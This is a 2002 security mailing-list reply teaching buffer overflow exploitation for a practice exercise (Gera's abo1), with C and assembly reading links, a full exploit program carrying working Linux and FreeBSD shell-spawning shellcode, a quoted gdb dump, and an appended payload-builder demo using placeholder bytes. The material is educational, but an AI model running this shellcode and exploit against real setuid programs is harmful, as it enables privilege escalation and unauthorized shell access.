RE: Assembler/C References

From: Claes Nyberg (md0claes@mdstud.chalmers.se)
Date: 07/17/02


Date: Wed, 17 Jul 2002 00:23:37 +0200 (MET DST)
From: Claes Nyberg <md0claes@mdstud.chalmers.se>
To: <vuln-dev@securityfocus.com>


You need to know what the execution flow of the program you want to exploit
looks like. In order to "see" this, you need to know how memory and the CPU
work on the target architecture.

My advice is that you write a program in C, and convert each routine into
assembly when it is finished. This way you learn enough to understand
"Smashing the Stack for Fun and Profit", which will guide you through the
shellcode and buffer overflow exploit process.

C links:
http://www.cee.hw.ac.uk/~rjp/Coursewww/Cwww/index.html
http://www.erlenstar.demon.co.uk/unix/faq_toc.html
http://users.actcom.co.il/~choo/lupg/tutorials/
http://www.whitefang.com/sup/secure-faq.html
http://www.developerweb.net/sock-faq/

Assembly links:
http://webster.cs.ucr.edu/Page_AoALinux/aoa.pdf.gz
http://webster.cs.ucr.edu/
http://linuxassembly.org/
http://lsd-pl.net/documents/asmcodes-1.0.2.pdf
http://segfault.net/~scut/cpu/

// CMN

-- Begin abo1x.c --

/*
 * Solution to
 * http://community.core-sdi.com/~gera/InsecureProgramming/abo1.html
 *
 * Claes M. Nyberg <md0claes@mdstud.chalmers.se>
 *
 * 32-bit x86 only (the inline asm reads %esp and the shellcode uses
 * int $0x80); build with -m32 on a 64-bit toolchain.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* buf + 4 = ret */
#define BUFFSIZE (256+8)
#define NOP 0x90

#define FBSD_PROG "./abo1-fbsd"
#define LINUX_PROG "./abo1-linux"

#define FREEBSD_OFFSET 480
#define LINUX_OFFSET 400

/*
 * FreeBSD shellcode - execve("/bin//sh", {"/bin//sh", NULL}, NULL), exit(1)
 * BSD syscalls take their arguments on the stack: envp, argv and path are
 * pushed, followed by a dummy return address, before int $0x80.
 */
static char fbsdcode[] =
    "\x31\xc0" /* xorl %eax, %eax */
    "\x50" /* pushl %eax            (NUL terminator of the path) */
    "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f  ("//sh") */
    "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f  ("/bin") */
    "\x89\xe3" /* movl %esp, %ebx   (%ebx = "/bin//sh") */
    "\x50" /* pushl %eax            (argv[1] = NULL) */
    "\x53" /* pushl %ebx            (argv[0] = path) */
    "\x89\xe2" /* movl %esp, %edx   (%edx = argv) */
    "\x50" /* pushl %eax            (envp = NULL) */
    "\x52" /* pushl %edx            (argv) */
    "\x53" /* pushl %ebx            (path) */
    "\x50" /* pushl %eax            (dummy return address) */
    "\xb0\x3b" /* movb $0x3b, %al   (SYS_execve) */
    "\xcd\x80" /* int $0x80 */
    "\x31\xc0" /* xorl %eax, %eax */
    "\x40" /* inc %eax              (SYS_exit) */
    "\x50" /* pushl %eax */
    "\x50" /* pushl %eax */
    "\xcd\x80"; /* int $0x80 */

/*
 * Linux shellcode
 * setreuid(geteuid(), -1), setregid(getegid(), -1),
 * execve("/bin//sh", {"/bin//sh", NULL}, NULL), exit
 * Linux takes the syscall number in %eax and arguments in %ebx, %ecx, %edx.
 */
static char linuxcode[] =
    "\xb9\xff\xff\xff\xff" /* movl $-1, %ecx    (leave the effective id alone) */
    "\x31\xc0" /* xorl %eax, %eax */
    "\xb0\x31" /* movb $0x31, %al   (geteuid) */
    "\xcd\x80" /* int $0x80 */
    "\x89\xc3" /* movl %eax, %ebx */
    "\xb0\x46" /* movb $0x46, %al   (setreuid) */
    "\xcd\x80" /* int $0x80 */
    "\x31\xc0" /* xorl %eax, %eax */
    "\xb0\x32" /* movb $0x32, %al   (getegid) */
    "\xcd\x80" /* int $0x80 */
    "\x89\xc3" /* movl %eax, %ebx */
    "\xb0\x47" /* movb $0x47, %al   (setregid) */
    "\xcd\x80" /* int $0x80 */
    "\x31\xd2" /* xorl %edx, %edx   (envp = NULL) */
    "\x52" /* pushl %edx            (NUL terminator of the path) */
    "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f  ("//sh") */
    "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f  ("/bin") */
    "\x89\xe3" /* movl %esp, %ebx   (%ebx = "/bin//sh") */
    "\x52" /* pushl %edx            (argv[1] = NULL) */
    "\x53" /* pushl %ebx            (argv[0] = path) */
    "\x89\xe1" /* movl %esp, %ecx   (%ecx = argv) */
    "\xb0\x0b" /* movb $0xb, %al    (execve) */
    "\xcd\x80" /* int $0x80 */
    "\x31\xc0" /* xorl %eax, %eax */
    "\x40" /* inc %eax              (exit) */
    "\xcd\x80"; /* int $0x80 */

/*
 * Current stack pointer. The value is returned through an explicit output
 * operand instead of relying on whatever is left in %eax by a function
 * without a return statement.
 */
u_long
get_esp(void)
{
    u_long esp;

    asm("movl %%esp, %0" : "=r" (esp));
    return esp;
}

int
main(int argc, char *argv[])
{
    u_char buf[BUFFSIZE+1];
    const char *code;
    const char *prog;
    u_long addr;

    /* Guess: the target's stack sits near ours, minus an OS-specific offset */
    addr = get_esp() + 20 + BUFFSIZE;

    if (argc < 2) {
        printf("Usage: %s <linux | freebsd> [offset]\n", argv[0]);
        exit(1);
    }
    else if (!strcmp(argv[1], "linux")) {
        code = linuxcode;
        prog = LINUX_PROG;
        addr -= LINUX_OFFSET;
    }
    else if (!strcmp(argv[1], "freebsd")) {
        code = fbsdcode;
        prog = FBSD_PROG;
        addr -= FREEBSD_OFFSET;
    }
    else
        exit(1);

    /* Optional: override the offset from the command line */
    if (argv[2])
        addr = get_esp() + 20 + BUFFSIZE - strtoul(argv[2], NULL, 0);

    /* Set NOP's */
    memset(buf, NOP, BUFFSIZE);

    /* Copy shellcode, leaving 30 bytes of slack before the saved frame */
    memcpy(&buf[BUFFSIZE - strlen(code) - 30], code, strlen(code));

    /* Set return address (little-endian, as the CPU will pop it) */
    *((u_long *)&buf[260]) = addr;
    buf[BUFFSIZE] = '\0';

    fprintf(stderr, "Using address 0x%08lx\n", *((u_long *)&buf[260]));
    execlp(prog, prog, (char *)buf, (char *)NULL);
    perror("execlp");
    exit(1);
}

-- End abo1x.c --

------------------------------------------------------------------------------
Home: http://www.mdstud.chalmers.se/~md0claes/
------------------------------------------------------------------------------
Citation :
The number of UNIX installations has grown to 10, with more expected.
_The UNIX Programmer's Manual_, Second Edition, June, 1972
------------------------------------------------------------------------------

On Tue, 16 Jul 2002, Jeremy Junginger wrote:

> Hey guys,
> Thanks for all of the great feedback about assembler and c. I was
> playing with the code at:
> http://community.core-sdi.com/~gera/InsecureProgramming/abo1.html
> (Thanks for the link, Claes)
> And if it is run, it produces a segmentation fault. After running gdb
> against the program, I obtain the following data:
>
> [rewt@n00bB0x]# gdb abo1
>
> Copyright 2001 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and you
> are
> welcome to change it and/or distribute copies of it under certain
> conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB. Type "show warranty" for
> details.
> This GDB was configured as "i386-redhat-linux"...
> (gdb) disass main
> Dump of assembler code for function main:
> 0x8048460 <main>: push %ebp
> 0x8048461 <main+1>: mov %esp,%ebp
> 0x8048463 <main+3>: sub $0x108,%esp
> 0x8048469 <main+9>: sub $0x8,%esp
> 0x804846c <main+12>: mov 0xc(%ebp),%eax
> 0x804846f <main+15>: add $0x4,%eax
> 0x8048472 <main+18>: pushl (%eax)
> 0x8048474 <main+20>: lea 0xfffffef8(%ebp),%eax
> 0x804847a <main+26>: push %eax
> 0x804847b <main+27>: call 0x804834c <strcpy>
> 0x8048480 <main+32>: add $0x10,%esp
> 0x8048483 <main+35>: leave
> 0x8048484 <main+36>: ret
> 0x8048485 <main+37>: lea 0x0(%esi),%esi
> 0x8048488 <main+40>: nop
> 0x8048489 <main+41>: nop
> 0x804848a <main+42>: nop
> 0x804848b <main+43>: nop
> 0x804848c <main+44>: nop
> 0x804848d <main+45>: nop
> 0x804848e <main+46>: nop
> 0x804848f <main+47>: nop
> End of assembler dump.
> (gdb) quit
>
> [rewt@n00bB0x]#
>
> I guess I don't really know where to go from here. I see that the
> buffer has space for 256 bytes. Okay, so I run ./abo1 AAAAAAAA(256
> times) and it runs okay, then when I run ./abo1 with AAAA(more than
> 256X) it returns with a segmentation fault. The part I'm not
> understanding is, after I've overflowed the buffer, how do I know where
> the next bytes will be stored? Will they be stored at the next memory
> address (in this case 0x8048480)? Once you know where they are stored,
> how can you append your code, do you just do a
> AAAAAA(howevermanytimesyouneedit) and then append your code to the end
> of it?
>
> Thanks for fielding these beginner questions. They're embarrassing to
> ask, but everyone's gotta start somewhere.
>
> -Jeremy
>
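Added example, not part of the original post or of Claes's abo1x.c: a small payload builder that lays out the [NOP sled][shellcode][return address] buffer the exploit above hands to the vulnerable program, together with the checks worth running before sweeping offsets. The distance from the buffer to the saved return address is taken from the gdb dump in the quoted question: main() passes -0x108(%ebp) to strcpy, the saved %ebp sits at 0(%ebp) and the return address at 4(%ebp), so the address lands at buf + 0x108 + 4 = 268 (abo1x.c writes it at buf[260], which reflects the frame of the author's own build; the frame must be confirmed in gdb for whatever binary you actually run). The 32 bytes of 0xcc standing in for shellcode and the address 0xbffffabc are constructed placeholders. Because strcpy() is the copying primitive, the builder refuses any shellcode or address containing a NUL byte, since the copy would stop there and never reach the saved return address.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90

/* Distance from the start of abo1's buffer to the saved return address,
 * derived from the quoted disassembly: buffer at -0x108(%ebp), saved
 * %ebp at 0(%ebp), return address at 4(%ebp). */
#define ABO1_RET_OFFSET (0x108 + 4)   /* 268 */

/* Largest payload this demo builds: sled+shellcode, 4-byte address, NUL. */
#define MAX_PAYLOAD (ABO1_RET_OFFSET + 4 + 1)

/* strcpy() stops at the first NUL, so a 0x00 anywhere before the return
 * address truncates the copy.  Returns the index of the first NUL or -1. */
int find_nul(const unsigned char *p, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (p[i] == 0)
            return (int)i;
    return -1;
}

/*
 * Lay the payload out in out[]:
 *   out[0 .. ret_off-codelen-1]         NOP sled
 *   out[ret_off-codelen .. ret_off-1]   shellcode, ending at the saved %ebp
 *   out[ret_off .. ret_off+3]           return address, little-endian
 *   out[ret_off+4]                      NUL so strcpy() stops here
 * Returns the number of bytes strcpy() will copy, or -1 if the layout
 * cannot work (no room, shellcode too long, or a NUL in code/address).
 */
int build_payload(unsigned char *out, size_t outsz,
                  const unsigned char *code, size_t codelen,
                  size_t ret_off, uint32_t ret_addr)
{
    if (outsz < ret_off + 4 + 1 || codelen > ret_off)
        return -1;
    if (find_nul(code, codelen) >= 0)
        return -1;
    for (int i = 0; i < 4; i++)                 /* NUL inside the address */
        if (((ret_addr >> (8 * i)) & 0xff) == 0)
            return -1;

    memset(out, NOP, ret_off);
    memcpy(out + ret_off - codelen, code, codelen);
    for (int i = 0; i < 4; i++)                 /* x86 is little-endian */
        out[ret_off + i] = (unsigned char)(ret_addr >> (8 * i));
    out[ret_off + 4] = '\0';
    return (int)(ret_off + 4);
}

/* The address the CPU will pop: read back little-endian from ret_off. */
uint32_t payload_ret(const unsigned char *p, size_t ret_off)
{
    return (uint32_t)p[ret_off] | ((uint32_t)p[ret_off + 1] << 8) |
           ((uint32_t)p[ret_off + 2] << 16) | ((uint32_t)p[ret_off + 3] << 24);
}

unsigned char g_payload[MAX_PAYLOAD];

/* Demo: 32 bytes of 0xcc (int3) stand in for shellcode so the layout can
 * be inspected without executing anything.  Returns the payload length. */
int demo_build(uint32_t ret_addr)
{
    unsigned char code[32];

    memset(code, 0xcc, sizeof code);
    return build_payload(g_payload, sizeof g_payload, code, sizeof code,
                         ABO1_RET_OFFSET, ret_addr);
}

int main(void)
{
    /* 0xbffffabc is an assumed address inside the NOP sled; the real one
     * must be read from gdb or swept with an offset, as abo1x.c does. */
    int n = demo_build(0xbffffabcU);

    if (n < 0) {
        fprintf(stderr, "layout problem\n");
        return 1;
    }
    printf("%d bytes: %d NOPs, shellcode at +%d, ret 0x%08x at +%d\n",
           n, ABO1_RET_OFFSET - 32, ABO1_RET_OFFSET - 32,
           payload_ret(g_payload, ABO1_RET_OFFSET), ABO1_RET_OFFSET);
    return 0;
}
```

The two rejections are the ones that silently break beginners' first attempts: a shellcode with an embedded 0x00 (common before it is massaged to be NUL-free) and a return address such as 0x08048xxx whose top byte is zero, either of which makes strcpy() stop short of the saved return address so the program simply crashes with the original address intact.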


